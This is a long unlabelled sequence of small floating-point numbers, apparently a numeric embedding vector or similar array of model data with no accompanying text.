-0.010596189647912979, 0.019736066460609436, 0.008146247826516628, 0.011066457256674767, -0.02568267658352852, -0.025136558338999748, -0.003881603479385376, 0.018765192478895187, -0.03182649239897728, -0.003492874326184392, 0.005370152182877064, -0.01394115760922432, 0.0039593493565917015, 0.04095878824591637, 0.012257295660674572, 0.001209801179356873, 0.011726348660886288, -0.034557078033685684, 0.01210559718310833, -0.0176122784614563, -0.012257295660674572, 0.02985440380871296, -0.025849545374512672, 0.020843470469117165, 0.013721193186938763, 0.013652929104864597, 0.0039934818632900715, -0.045236703008413315, -0.02049456350505352, 0.011096796952188015, 0.01196906715631485, 0.0017028236761689186, -0.01920511946082115, 0.005957986228168011, -0.00024840745027177036, 0.00804764311760664, -0.00005958342080703005, 0.01976640708744526, 0.012492429465055466, -0.030885959044098854, 0.028079522773623466, -0.014092856086790562, 0.02063109166920185, 0.008191756904125214, 0.01985742710530758, -0.04050368815660477, -0.031705133616924286, -0.0038455750327557325, 0.04029130935668945, -0.010907173156738281, -0.013819797895848751, 0.014836182817816734, 0.023164469748735428, 0.029839234426617622, -0.03228159248828888, 0.023043109104037285, -0.023831944912672043, 0.005358774680644274, -0.0063827442936599255, -0.020782791078090668, 0.017718467861413956, -0.026243962347507477, 0.01024728175252676, 0.010125922039151192, -0.00983769353479147, -0.024590441957116127, 0.04626825824379921, -0.0005641314201056957, -0.002961927093565464, -0.025242747738957405, 0.010042487643659115, 0.007103315554559231, -0.017399899661540985, -0.009943882934749126, 0.019159609451889992, 0.025197237730026245, -0.018234245479106903, -0.019523687660694122, -0.001975882099941373, -0.014123196713626385, 0.0035270066000521183, 0.019083760678768158, -0.03804616257548332, 0.01591324619948864, -0.0001624840806471184, -0.009541880339384079, 0.027063138782978058, 0.013819797895848751, 0.01893206126987934, -0.012977867387235165, 0.0005200438317842782, -0.005734229926019907, 0.0076987347565591335, 0.004858167376369238, -0.0012344523565843701, 0.010816153138875961, -0.015746377408504486, -0.037955142557621, 0.027017628774046898, 0.0014951853081583977, 0.019478177651762962, 0.02953583560883999, 0.003966934513300657, 0.016064945608377457, -0.0049036769196391106, -0.007330864202231169, -0.0000647091947030276, 0.03631678968667984, -0.01943266950547695, 0.03837990015745163, 0.001325471792370081, 0.004979526624083519, -0.03234227001667023, 0.052669964730739594, -0.036286450922489166, -0.00159663415979594, -0.025333767756819725, -0.01504097692668438, -0.01389564760029316, -0.03552795574069023, 0.001280910219065845, -0.021328909322619438, -0.007433261256664991, -0.007994548417627811, 0.02672940120100975, 0.011415365152060986, -0.008313116617500782, 0.02457527257502079, 0.004403069615364075, 0.00018263162928633392, -0.018780361860990524, -0.015177506022155285, 0.008419306017458439, -0.015283695422112942, 0.02287624031305313, 0.011415365152060986, -0.027548575773835182, -0.009291576221585274, 0.021541288122534752, 0.002552339108660817, -0.0028898699674755335, -0.04429616779088974, 0.0041755205020308495, -0.009359841234982014, -0.01709650084376335, -0.016671743243932724, 0.025091048330068588, 0.00695920130237937, -0.035558294504880905, -0.016444195061922073, -0.010103167034685612, 0.013023377396166325, 0.01765778847038746, 0.04490296542644501, -0.008260021917521954, 0.011111967265605927, -0.007569790352135897, 0.01165049895644188, 0.035558294504880905, -0.021905366331338882, 0.001134899677708745, -0.005734229926019907, -0.028003674000501633, 0.000436609290773049, 0.009215726517140865, -0.0041982755064964294, -0.034678440541028976, -0.007865604013204575, 0.046237919479608536, 0.031796153634786606, -0.00566217303276062, -0.020691772922873497, -0.02842843160033226, -0.028671151027083397, -0.0035383841022849083, 0.00513501837849617, 0.00036881869891658425, 0.008563420735299587, -0.01560984831303358, 0.010436905547976494, 0.03844057768583298, 0.011536724865436554, -0.01582222804427147, 0.010118337348103523, 0.0211468692868948, -0.01460104901343584, -0.0006978163728490472, -0.028307072818279266, -0.018507303670048714, 0.007126070559024811, -0.020069805905222893, -0.003119315020740032, -0.00037427039933390915, 0.0436590313911438, -0.022178424522280693, -0.012280050665140152, -0.008176587522029877, 0.039684511721134186, -0.0013757222332060337, -0.04123184457421303, -0.02031252346932888, 0.01820390485227108, -0.0145327840000391, 0.005040206015110016, 0.015898076817393303, -0.012287636287510395, -0.010353471152484417, 0.006583745591342449, 0.010831323452293873, -0.005688720382750034, -0.0159587562084198, 0.004668543115258217, -0.014570709317922592, -0.039320435374975204, -0.0069326539523899555, -0.009625314734876156, 0.01162015926092863, -0.017339220270514488, -0.009754259139299393, 0.017536427825689316, 0.010929928161203861, -0.009223312139511108, -0.01535954512655735, 0.0014326093951240182, -0.03443571925163269, -0.024590441957116127, -0.008146247826516628, -0.03140173479914665, -0.00829794630408287, 0.052245207130908966, -0.02512138895690441, -0.003508044173941016, -0.018355604261159897, 0.001024917815811932, 0.02357405796647072, 0.04232408106327057, 0.002520103007555008, -0.03185683488845825, 0.03686290606856346, 0.010823738761246204, -0.0432039350271225, 0.02788231521844864, -0.011354685761034489, -0.00638653663918376, 0.006352404598146677, -0.013834968209266663, -0.0016800687881186604, 0.04563112184405327, -0.007414299063384533, 0.014798257499933243, -0.0020612129010260105, -0.020888980478048325, -0.016125624999403954, -0.008184172213077545, -0.025015199556946754, 0.00694782380014658, 0.05012141913175583, -0.026577701792120934, -0.0003782999119721353, -0.020752452313899994, 0.018810702487826347, 0.028989719226956367, -0.005711475387215614, -0.001548280008137226, 0.02600124478340149, -0.0039707268588244915, 0.009230896830558777, -0.037075284868478775, 0.011407780461013317, 0.0008262866176664829, -0.02076762169599533, -0.01906859129667282, -0.01394115760922432, -0.03343450650572777, -0.026699060574173927, -0.011794613674283028, 0.01052792463451624, 0.0023532339837402105, -0.000017643922546994872, 0.01783982664346695, 0.01940232887864113, 0.015253355726599693, -0.022891409695148468, -0.0043651447631418705, -0.020782791078090668, -0.009450860321521759, 0.004221030510962009, -0.006162780337035656, 0.008889573626220226, 0.002637669909745455, 0.009519125334918499, 0.004065538756549358, 0.03507285565137863, 0.04584350064396858, -0.02113169990479946, -0.00843447633087635, -0.009981808252632618, -0.008282776921987534, 0.00024911854416131973, 0.016444195061922073, -0.0010637907544150949, 0.000315012875944376, 0.020555242896080017, 0.02581920474767685, -0.0029846818652004004, 0.020873811095952988, 0.005047791171818972, 0.0031325886957347393, 0.006978163495659828, -0.0016743800370022655, 0.02361956611275673, -0.026941780000925064, -0.0304915402084589, 0.0197208970785141, 0.03222091123461723, 0.007858019322156906, -0.053944237530231476, -0.007285354658961296, -0.0043992772698402405, 0.008821308612823486, 0.016155965626239777, 0.009503955021500587, 0.0071602026000618935, -0.0037052531260997057, 0.021890195086598396, -0.0024689047131687403, 0.039047375321388245, -0.010854078456759453, -0.002015703124925494, 0.00005214660268393345, -0.00951154064387083, -0.007850433699786663, 0.014517614617943764, -0.004357559606432915, -0.011453290469944477, -0.021526116877794266, 0.016762763261795044, -0.04805830866098404, -0.015989096835255623, -0.0210861898958683, 0.00567355053499341, -0.003868329804390669, 0.003492874326184392, 0.013015791773796082, 0.022724540904164314, -0.009943882934749126, -0.021859856322407722, -0.02361956611275673, 0.025364108383655548, -0.029368966817855835, 0.004941601771861315, -0.0030074368696659803, 0.0073156943544745445, -0.0161863062530756, -0.023118959739804268, -0.015511244535446167, -0.012719978578388691, 0.015700867399573326, -0.050455156713724136, -0.018173566088080406, 0.016201475635170937, -0.027487896382808685, 0.0057494002394378185, -0.012189031578600407, -0.01568569801747799, -0.02609226480126381, 0.01201457716524601, -0.009246067143976688, -0.03634713217616081, 0.012158691883087158, 0.027897484600543976, 0.09114088118076324, -0.0007859915494918823, 0.017035821452736855, -0.022527333348989487, -0.011210571974515915, 0.006830256897956133, 0.004076916258782148, 0.015943586826324463, 0.01178702898323536, 0.01724820025265217, 0.016019435599446297, -0.005821457132697105, -0.012993037700653076, 0.012719978578388691, 0.016110455617308617, 0.021328909322619438, 0.009071612730622292, -0.009435690939426422, 0.014858937822282314, -0.017263369634747505, 0.01171117927879095, -0.0008400343940593302, 0.013076472096145153, -0.012871677987277508, 0.014821012504398823, -0.01582222804427147, -0.012052502483129501, -0.010398981161415577, -0.04123184457421303, -0.010838908143341541, -0.0012325560674071312, -0.007516695652157068, -0.01650487445294857, -0.01056584995239973, 0.019554028287529945, -0.004084501415491104, 0.02063109166920185, -0.0023456490598618984, 0.00024236319586634636, -0.009716334752738476, 0.011294006370007992, -0.03622576966881752, -0.012189031578600407, 0.012932357378304005, -0.015549168922007084, -0.026744570583105087, 0.028625641018152237, 0.009261236526072025, -0.009898372925817966, -0.0057038902305066586, 0.0026187074836343527, -0.01788533665239811, 0.012158691883087158, 0.026623211801052094, -0.0019967409316450357, 0.018355604261159897, 0.004258955363184214, -0.021283399313688278, -0.02577369473874569, -0.01573120802640915, -0.005279132630676031, 0.004020029213279486, 0.008722704835236073, 0.014449349604547024, -0.009405351243913174, -0.0020650054793804884, -0.026668721809983253, 0.015670528635382652, -0.010808568447828293, 0.0159587562084198, 0.004130010958760977, 0.002010014606639743, 0.027897484600543976, 0.006204497534781694, 0.01568569801747799, 0.01382738258689642, -0.007467393763363361, 0.01102853287011385, -0.029080739244818687, -0.006906106602400541, 0.028367752209305763, 0.02164747752249241, -0.010618944652378559, 0.007933869026601315, -0.010368640534579754, 0.02949032559990883, -0.004952979274094105, 0.011984237469732761, 0.002650943584740162, -0.0018611596897244453, -0.019114099442958832, -0.007994548417627811, 0.0073156943544745445, 0.009405351243913174, 0.0065496135503053665, 0.02094965986907482, -0.005624248180538416, -0.011096796952188015, -0.015549168922007084, -0.03140173479914665, 0.005495303776115179, 0.017688127234578133, 0.048331368714571, -0.009139877744019032, 0.007444638758897781, 0.017915677279233932, -0.008161417208611965, 0.030385350808501244, 0.010694794356822968, -0.008267606608569622, -0.035831354558467865, -0.02493935078382492, 0.006462386343628168, -0.022254273295402527, -0.0030320880468934774, -0.0057380227372050285, 0.0007006607484072447, 0.011733933351933956, -0.0255916565656662, -0.03719664737582207, -0.020555242896080017, -0.005157772917300463, 0.03449640050530434, -0.014957541599869728, 0.0001294183894060552, -0.004854374565184116, 0.002402536105364561, -0.017718467861413956, 0.01940232887864113, 0.03746970370411873, 0.012932357378304005, -0.006322064436972141, 0.000538532214704901, -0.01306888647377491, 0.029505496844649315, -0.017020652070641518, 0.03998791053891182, 0.006997126154601574, -0.002586471615359187, -0.0013984771212562919, -0.006868181750178337, 0.03212989121675491, 0.020980000495910645, 0.009974222630262375, 0.016899291425943375, 0.00035009332350455225, 0.005184320267289877, 0.008866818621754646, 0.028079522773623466, 0.008191756904125214, -0.0015710348961874843, -0.026850759983062744, 0.01793084666132927, 0.04162626340985298, 0.008897158317267895, -0.01132434606552124, 0.012962697073817253, -0.017870167270302773, -0.0068112947046756744, 0.016216645017266273, 0.007236052304506302, 0.01953885890543461, 0.01650487445294857, 0.0036881871055811644, -0.006439631339162588, 0.030066782608628273, -0.006261385045945644, -0.03137139603495598, -0.005210867617279291, -0.03586169332265854, -0.0032729103695601225, 0.0013899439945816994, -0.02443874254822731, 0.00843447633087635, 0.010664454661309719, 0.005055376328527927, 0.0017379040364176035, -0.006693727802485228, 0.02375609613955021, -0.008260021917521954, -0.009898372925817966, 0.01774880662560463, -0.005021243821829557, -0.012780657969415188, 0.014343160204589367, -0.019872596487402916, -0.029004888609051704, 0.020737281069159508, -0.04781559109687805, 0.02953583560883999, 0.01564018800854683, 0.016125624999403954, -0.01944783888757229, -0.007971793413162231, -0.012780657969415188, -0.021859856322407722, -0.012810998596251011, -0.016474533826112747, -0.008912328630685806, -0.01167325396090746, -0.016429023817181587, -0.015625018626451492, -0.015094071626663208, -0.007387751247733831, -0.0007603922858834267, -0.017597109079360962, 0.0045433915220201015, 0.00694782380014658, 0.00008539006375940517, 0.01013350673019886, -0.030779769644141197, 0.016474533826112747, 0.008684779517352581, 0.01389564760029316, 0.026334982365369797, 0.00639791414141655, 0.0056849280372262, -0.037955142557621, -0.004763355012983084, -0.00047761548194102943, -0.024924179539084435, 0.012879262678325176, 0.007069183047860861, 0.003944179508835077, -0.03273668885231018, 0.0019133063033223152, 0.030931469053030014, -0.01668691262602806, -0.010436905547976494, -0.0004399277095217258, -0.024560101330280304, -0.0008661076426506042, 0.007797339465469122, 0.011422950774431229, -0.004839204717427492, -0.0307190902531147, 0.011953897774219513, 0.012902017682790756, 0.02126822993159294, -0.017278539016842842, 0.005267755128443241, -0.004107255954295397, -0.029930254444479942, -0.012909602373838425, -0.01723303087055683, -0.00020289768872316927, 0.008055227808654308, -0.0006902313907630742, -0.001471482333727181, 0.03871363773941994, -0.025060709565877914, -0.01752125844359398, -0.0026471512392163277, -0.01013350673019886, -0.011180231347680092, 0.03176581487059593, 0.009010933339595795, -0.010452075861394405, -0.006064176093786955, 0.002169298706576228, 0.006238630041480064, -0.018583152443170547, 0.0006466179038397968, 0.008085567504167557, -0.02328582853078842, 0.04196000099182129, -0.015344374813139439, -0.0031648247968405485, 0.002906935987994075, 0.004698882810771465, -0.003356344997882843, 0.005783532280474901, 0.013235756196081638, -0.002942964667454362, -0.0015160440234467387, -0.009223312139511108, 0.005753192584961653, -0.015124411322176456, -0.0026547361630946398, -0.003094663843512535, -0.007691150065511465, 0.05512749403715134, 0.012090426869690418, -0.014638973399996758, 0.01677793264389038, -0.017915677279233932, -0.034921158105134964, 0.011938727460801601, -0.013167491182684898, -0.023164469748735428, -0.005802494939416647, 0.013592248782515526, 0.002049835631623864, -0.026941780000925064, 0.02223910391330719, 0.008631684817373753, -0.01573120802640915, 0.036620188504457474, -0.03137139603495598, 0.0009376907255500555, 0.016535213217139244, 0.013364700600504875, 0.00834345631301403, 0.004471334163099527, 0.0029031436424702406, 0.012894432991743088, -0.01451002899557352, -0.008290361613035202, 0.010975438170135021, -0.008669610135257244, 0.0015207845717668533, -0.009685994125902653, -0.010148677043616772, -0.042657818645238876, 0.0023703002370893955, 0.012325560674071312, 0.00919297244399786, -0.013789458200335503, -0.011817368678748608, 0.00128659897018224, 0.004020029213279486, -0.015882907435297966, -0.005540813785046339, -0.0290655680000782, -0.01237865537405014, -0.00005294657967169769, 0.008161417208611965, 0.011058872565627098, 0.015594678930938244, -0.010755473747849464, 0.014836182817816734, 0.006310686934739351, 0.031432077288627625, 0.0014828597195446491, 0.0019720897544175386, -0.018992740660905838, -0.0030320880468934774, 0.01920511946082115, -0.00841172132641077, 0.004619240760803223, -0.029459986835718155, 0.03428402170538902, -0.010687209665775299, 0.006064176093786955, 0.029004888609051704, 0.00582524947822094, 0.004372729919850826, -0.012826167978346348, -0.004221030510962009, -0.029733045026659966, -0.035558294504880905, -0.01123332604765892, 0.0012012680526822805, 0.0018440935527905822, 0.0011747207026928663, 0.005897306837141514, -0.0035801013000309467, 0.009868033230304718, 0.0051653580740094185, -0.0441141314804554, -0.021859856322407722, 0.007835264317691326, 0.0024821783881634474, -0.011976652778685093, -0.006659595295786858, -0.007433261256664991, -0.011529140174388885, 0.006447216495871544, 0.009215726517140865, -0.02631981298327446, -0.00873787421733141, 0.013099227100610733, 0.010353471152484417, 0.010072827339172363, 0.007228467147797346, 0.0009082990000024438, 0.014912032522261143, -0.018355604261159897, -0.025834375992417336, 0.015496074222028255, 0.007247429806739092, 0.009602559730410576, 0.007766999304294586, 0.00281970901414752, -0.026304643601179123, 0.018052205443382263, -0.013000622391700745, 0.01706616021692753, -0.02233012393116951, -0.0021996386349201202, 0.003997274208813906, 0.027958163991570473, 0.014161121100187302, 0.04189931973814964, 0.008426890708506107, 0.002705934690311551, 0.025106219574809074, -0.009981808252632618, -0.023498207330703735, 0.009739088825881481, 0.020570412278175354, 0.011680838651955128, -0.005070546176284552, 0.014866522513329983, -0.014714823104441166, -0.0011007674038410187, -0.022815560922026634, -0.020524902269244194, 0.034648098051548004, 0.007994548417627811, 0.02330099791288376, -0.006856804247945547, 0.03288839012384415, -0.01058860495686531, -0.0053208498284220695, 0.003644573502242565, -0.01714201085269451, 0.00021593434212263674, -0.01451002899557352, 0.024681461974978447, 0.016034606844186783, -0.007634262554347515, -0.008153832517564297, -0.03131071850657463, 0.017551599070429802, -0.008040058426558971, 0.01201457716524601, -0.015625018626451492, 0.012408995069563389, 0.009139877744019032, 0.004649580921977758, 0.012515184469521046, 0.01212835218757391, -0.019235460087656975, 0.017506089061498642, 0.011202986352145672, -0.025758525356650352, -0.008472400717437267, -0.00618932768702507, -0.008237266913056374, 0.007004710845649242, -0.0034189210273325443, -0.0067999172024428844, 0.0028671149630099535, 0.010368640534579754, -0.015564339235424995, -0.004118633456528187, 0.007440846413373947, -0.0005717164021916687, -0.0067430296912789345, 0.004714053124189377, -0.004475126508623362, 0.007095730397850275, 0.013728778809309006, 0.004710260313004255, 0.012803412973880768, 0.013311605900526047, 0.01428248081356287, 0.002523895585909486, -0.0019720897544175386, 0.003748866729438305, -0.02741204760968685, 0.026668721809983253, 0.000673165253829211, 0.012848922982811928, 0.006849219091236591, -0.00016663210408296436, -0.011551895178854465, -0.007694942411035299, -0.007550828158855438, 0.017809487879276276, -0.0024480458814650774, -0.002036561956629157, 0.0016411958495154977, 0.0010988711146637797, -0.01879553124308586, -0.0034284021239727736, -0.0182949248701334, 0.000637610733974725, 0.001090338104404509, 0.012977867387235165, 0.010042487643659115, -0.0061438181437551975, 0.012249710969626904, -0.0012723770923912525, 0.022178424522280693, 0.003729904303327203, 0.0043651447631418705, 0.0036957720294594765, 0.006496518850326538, 0.008859233930706978, -0.0029031436424702406, -0.01865900307893753, 0.018871381878852844, 0.006856804247945547, 0.012537939473986626, 0.0009775117505341768, 0.01802186667919159, 0.023816775530576706, 0.0008689520182088017, 0.00582524947822094, -0.013038546778261662, 0.015928417444229126, 0.00362750724889338, 0.019872596487402916, -0.01208284217864275, -0.016019435599446297, -0.0005394803010858595, 0.02054007351398468, -0.009890788234770298, 0.0036843945272266865, -0.019159609451889992, 0.005756984930485487, 0.004050368908792734, -0.0028709075413644314, 0.007850433699786663, -0.010027317330241203, 0.0073384493589401245, -0.022982429713010788, -0.0018829663749784231, 0.0011396403424441814, 0.016793102025985718, -0.0018355604261159897, -0.016444195061922073, 0.0005025036516599357, 0.019326480105519295, 0.006401706486940384, 0.006477556191384792, -0.015496074222028255, -0.004361352417618036, 0.00310035259462893, -0.0017492815386503935, -0.0055825309827923775, -0.009139877744019032, -0.0077328672632575035, 0.0009594974690116942, 0.023088619112968445, -0.020752452313899994, 0.012515184469521046, -0.017854996025562286, 0.011438120156526566, 0.0013984771212562919, -0.005028828978538513, 0.019038250669836998, 0.006560990586876869, -0.012636544182896614, 0.0005560723948292434, 0.004934016615152359, -0.017369559034705162, 0.009299161843955517, 0.005400491878390312, -0.010368640534579754, 0.0038247162010520697, -0.014077686704695225, 0.008935083635151386, 0.020433884114027023, -0.013425379991531372, 0.001862107776105404, -0.0043196347542107105, 0.013652929104864597, -0.009003347717225552, -0.012317975983023643, 0.015700867399573326, 0.012067671865224838, -0.002264110604301095, 0.014517614617943764, 0.00016959497588686645, 0.005446001421660185, -0.011438120156526566, -0.007789754308760166, -0.0028955587185919285, 0.0067999172024428844, -0.024271873757243156, 0.012659299187362194, -0.009723919443786144, 0.011331930756568909, -0.0065268585458397865, -0.018143225461244583, 0.022087404504418373, -0.010406565852463245, 0.035376254469156265, 0.004111048765480518, -0.022390803322196007, -0.00942052062600851, -0.0168689526617527, -0.018188735470175743, 0.014229386113584042, -0.02851945161819458, -0.018962401896715164, -0.005214660428464413, 0.0026281888131052256, 0.01705099083483219, -0.01614079624414444, -0.009458445943892002, -0.0014705342473462224, -0.01705099083483219, -0.022845901548862457, -0.0010220734402537346, -0.0008931290940381587, 0.014130781404674053, -0.001875381451100111, 0.012697223573923111, -0.00402382155880332, -0.011043702252209187, -0.0033051464706659317, 0.009208141826093197, 0.02357405796647072, -0.011953897774219513, -0.023953305557370186, -0.022815560922026634, 0.005241207778453827, -0.01201457716524601, -0.0038360937032848597, -0.005734229926019907, -0.01524577010422945, -0.006978163495659828, 0.006424461491405964, 0.0036919794511049986, -0.008191756904125214, -0.05333744361996651, 0.007774584461003542, 0.0003842256555799395, 0.003483392996713519, 0.009602559730410576, 0.008077982813119888, -0.006606500595808029, 0.020615922287106514, -0.021495778113603592, 0.021192379295825958, -0.00526396231725812, 0.005074338521808386, 0.03173547610640526, 0.011286420747637749, 0.010869248770177364, -0.010702379047870636, 0.025227578356862068, -0.0036540545988827944, 0.0031325886957347393, -0.01944783888757229, 0.0036654321011155844, 0.0034208172000944614, -0.02287624031305313, 0.000056027969549177215, -0.00398968905210495, -0.014707238413393497, 0.01089200284332037, 0.0145327840000391, -0.004361352417618036, -0.005946609191596508, 0.0012126455549150705, 0.0016544695245102048, 0.023270659148693085, -0.0002659476886037737, 0.03440538048744202, 0.007812509313225746, -0.002637669909745455, -0.012158691883087158, -0.002311516785994172, 0.010861663147807121, 0.013144736178219318, 0.00988320354372263, 0.003913839813321829, -0.0065154810436069965, -0.00013866255176253617, -0.0006063227774575353, 0.004949186462908983, -0.012264881283044815, 0.008540665730834007, 0.022087404504418373, 0.016717253252863884, -0.006595123093575239, 0.01093751285225153, 6.962756629036448e-7, -0.0006589434342458844, -0.010254866443574429, 0.0010704275919124484, -0.007467393763363361, -0.009868033230304718, -0.012826167978346348, -0.009428106248378754, 0.002673698589205742, -0.013266095891594887, 0.002821605186909437, -0.004270332865417004, 0.008290361613035202, -0.009845278225839138, -0.02278522029519081, -0.00919297244399786, -0.011422950774431229, -0.01695997081696987, 0.008328286930918694, 0.004600278567522764, 0.010467245243489742, -0.016429023817181587, -0.01196906715631485, -0.04496364668011665, -0.016201475635170937, 0.005203282926231623, -0.003261533100157976, 0.003898669732734561, 0.01582222804427147, -0.013213001191616058, -0.006162780337035656, 0.01049758493900299, 0.0006698468350805342, 0.012553109787404537, 0.004315842408686876, 0.0023968475870788097, -0.00008627892384538427, -0.00983769353479147, 0.02581920474767685, 0.0035763089545071125, 0.0015131996478885412, -0.0005911528714932501, 0.01052033994346857, 0.010785813443362713, -0.0015643980586901307, -0.013372285291552544, 0.010307961143553257, -0.01164291426539421, -0.021708156913518906, 0.010512755252420902, -0.0060755531303584576, -0.033495184034109116, 0.0071829576045274734, 0.009625314734876156, -0.01201457716524601, -0.0117415189743042, -0.025273088365793228, 0.0021901573054492474, 0.018128056079149246, 0.019114099442958832, 0.03625611215829849, 0.00581387197598815, -0.000024517792553524487, 0.015761548653244972, 0.0032653254456818104, -0.029824065044522285, -0.004277917556464672, -0.015078901313245296, 0.04132286459207535, 0.01499546691775322, -0.00036881869891658425, 0.004194483160972595, 0.008790968917310238, 0.010095582343637943, -0.0020517318043857813, -0.0007935764733701944, -0.029277946799993515, 0.01645936444401741, -0.014745162799954414, 0.0059314388781785965, -0.014790672808885574, 0.008479985408484936, 0.014062516391277313, -0.00405795406550169, 0.004425824619829655, -0.0010969749419018626, -0.004391692113131285, -0.016155965626239777, 0.006864389404654503, 0.01865900307893753, 0.01029279176145792, 0.00988320354372263, 0.010414150543510914, -0.0010628425516188145, 0.013357114978134632, -0.021237889304757118, -0.03081010840833187, -0.016444195061922073, 0.003344967495650053, -0.002650943584740162, 0.024105004966259003, -0.01627732440829277, 0.004190690815448761, -0.00048330420395359397, 0.01165049895644188, -0.015533998608589172, 0.013637758791446686, -0.00691369129344821, 0.028276732191443443, -0.0022261859849095345, -0.009541880339384079, 0.01632283441722393, 0.031022489070892334, -0.021359248086810112, -0.0008476193179376423, 0.009283991530537605, 0.00838896632194519, -0.015192675404250622, 0.010141092352569103, 0.013652929104864597, -0.01162015926092863, -0.014692068099975586, -0.006663387641310692, -0.009200557135045528, -0.009367425926029682, -0.0027609255630522966, -0.008055227808654308, -0.009594975039362907, -0.008358626626431942, -0.01233314536511898, -0.0010362952016294003, -0.0005674498388543725, 0.010012147948145866, 0.009784598834812641, 0.0003472489770501852, -0.00694782380014658, 0.013372285291552544, 0.006367574445903301, -0.012348315678536892, 0.00047216378152370453, -0.038167521357536316, 0.004308257717639208, 0.020782791078090668, -0.0024783858098089695, -0.008533080108463764, 0.0231948085129261, 0.018037036061286926, -0.011999407783150673, 0.011946313083171844, 0.010975438170135021, 0.0013852034462615848, -0.015791887417435646, 0.003608544822782278, -0.02126822993159294, 0.003629403654485941, -0.01861349307000637, 0.011855293065309525, -0.007880774326622486, -0.00800213310867548, 0.010778228752315044, -0.003341175150126219, -0.01421421580016613, -0.022679030895233154, 0.014161121100187302, -0.001600426621735096, -0.014070102013647556, -0.020843470469117165, 0.035194218158721924, -0.02196604572236538, 0.002586471615359187, 0.020752452313899994, -0.0020991377532482147, 0.004755770321935415, -0.021010341122746468, -0.004099671263247728, -0.002161713782697916, -0.004403069615364075, -0.004509259015321732, 0.014957541599869728, 0.006401706486940384, -0.011855293065309525, 0.017688127234578133, 0.013675684109330177, -0.007357411552220583, 0.011513969860970974, -0.018780361860990524, -0.010436905547976494, 0.00878338422626257, 0.022679030895233154, 0.011134722270071507, 0.020570412278175354, -0.014017007313668728, -0.01306888647377491, -0.019417498260736465, -0.010391395539045334, -0.00348528940230608, -0.020115315914154053, 0.0008585227187722921, 0.0071943351067602634, 0.004820242524147034, 0.009071612730622292, 0.013288850896060467, 0.00020230512018315494, 0.00007756807463010773, 0.0015805161092430353, -0.013175075873732567, -0.04584350064396858, 0.004406861960887909, 0.011043702252209187, 0.012917187996208668, -0.0011130929924547672, -0.014585878700017929, -0.023953305557370186, -0.016171135008335114, 0.014517614617943764, -0.0028822850435972214, 0.007729074917733669, -0.002262214431539178, -0.014714823104441166, 0.024787651374936104, -0.0025940565392374992, 0.03531557694077492, 0.036802228540182114, 0.005241207778453827, -0.000015243992493196856, -0.0009680305956862867, 0.002137062605470419, -0.0000753162894397974, 0.015124411322176456, -0.010952683165669441, -0.004433409310877323, 0.036984268575906754, 0.014138366095721722, 0.01944783888757229, 0.0020953454077243805, -0.006227252539247274, 0.005711475387215614, 0.021708156913518906, 0.009981808252632618, 0.0328277088701725, 0.0005499096587300301, -0.011051286943256855, 0.005453586578369141, -0.0028860773891210556, -0.009238481521606445, -0.0023285828065127134, -0.024150514975190163, 0.014229386113584042, 0.01723303087055683, 0.008335871621966362, 0.0049871113151311874, 0.0008196497801691294, 0.012917187996208668, -0.009754259139299393, 0.013592248782515526, -0.021162040531635284, -0.0004505940596573055, -0.023513376712799072, -0.0010476727038621902, 0.004262747708708048, 0.02879250980913639, 0.02214808389544487, -0.03355586528778076, 0.012735148891806602, 0.00807039812207222, -0.007175372447818518, -0.02512138895690441, -0.0021787798032164574, 0.006890936754643917, 0.0002792213635984808, 0.010755473747849464, -0.02260318212211132, -0.016611063852906227, -0.011036117561161518, -0.0014496755320578814, 0.011893218383193016, 0.0030605315696448088, 0.00002349560054426547, 0.02187502570450306, -0.010808568447828293, -0.005783532280474901, -0.0026281888131052256, -0.03076460026204586, -0.0234223585575819, -0.01428248081356287, -0.004228615667670965, 0.031432077288627625, -0.021753666922450066, -0.003621818497776985, -0.02704796940088272, 0.0026187074836343527, 0.0027097270358353853, 0.003604752477258444, -0.0065382360480725765, -0.013379869982600212, -0.014851352199912071, -0.0025959527119994164, -0.0029770969413220882, -0.008062812499701977, -0.008062812499701977, 0.023968474939465523, -0.001406062045134604, -0.011635329574346542, 0.014441764913499355, -0.004164143465459347, -0.014494859613478184, -0.007842849008738995, 0.009117122739553452, -0.005992118734866381, -0.02072211168706417, -0.03334348648786545, -0.021632306277751923, -0.012810998596251011, -0.021890195086598396, -0.006614085286855698, -0.0009045065380632877, 0.014297650195658207, -0.012226955965161324, 0.006064176093786955, -0.02911107800900936, 0.0182949248701334, 0.004645788110792637, 0.02751823700964451, -0.007103315554559231, 0.007410506252199411, 0.007209504954516888, 0.006280347239226103, -0.031098337844014168, 0.004740600474178791, -0.009822524152696133, -0.0112560810521245, -0.011589819565415382, 0.009761843830347061, -0.007691150065511465, -0.004907469265162945, 0.032858047634363174, -0.0015056146075949073, -0.02421119436621666, 0.017763977870345116, 0.001667743199504912, -0.02892903983592987, -0.0139639126136899, 0.01428248081356287, 0.008957838639616966, -0.0127958282828331, 0.03219057247042656, 0.011703593656420708, 0.008608929812908173, -0.011589819565415382, 0.003217919496819377, -0.00512364087626338, -0.03561897575855255, -0.026016414165496826, -0.02434772253036499, 0.000742378004360944, -0.019463008269667625, 0.020873811095952988, -0.006314479745924473, 0.021162040531635284, -0.00043779442785307765, -0.00029273206018842757, 0.01089200284332037, 0.007482563611119986, 0.0053094723261892796, 0.00335824117064476, 0.00621208269149065, -0.0015160440234467387, 0.010694794356822968, 0.009344670921564102, -0.0113698560744524, -0.014138366095721722, 0.013660513795912266, -0.01902308128774166, -0.012234541587531567, -0.003955557011067867, -0.017126841470599174, 0.01171876396983862, 0.0031496547162532806, -0.0071829576045274734, 0.013781873509287834, -0.01743023842573166, -0.018097715452313423, 0.009519125334918499, -0.0024973482359200716, 0.014343160204589367, 0.009177802130579948, -0.016216645017266273, -0.0013178868684917688, -0.008578590117394924, -0.01756676845252514, -0.018052205443382263, 0.02339201793074608, 0.021162040531635284, -0.003479600651189685, -0.025318598374724388, -0.019554028287529945, -0.016398685052990913, 0.027078308165073395, 0.008874403312802315, -0.0013643447309732437, -0.01999395526945591, -0.023073449730873108, 0.013334360904991627, -0.0049036769196391106, -0.004907469265162945, 0.0023513378109782934, 0.01902308128774166, -0.001155758392997086, -0.013387455604970455, 0.006473763845860958, 0.028261562809348106, 0.0018602116033434868, 0.01632283441722393, 0.015003051608800888, -0.0010486207902431488, -0.0027381707914173603, 0.01668691262602806, 0.023361677303910255, -0.007933869026601315, 0.024772480130195618, 0.012902017682790756, -0.008889573626220226, -0.012151106260716915, -0.006579953245818615, -0.0017284228233620524, 0.009352256543934345, 0.0013738259440287948, -0.01953885890543461, 0.0045433915220201015, -0.008593760430812836, -0.0027912654913961887, 0.006746822502464056, 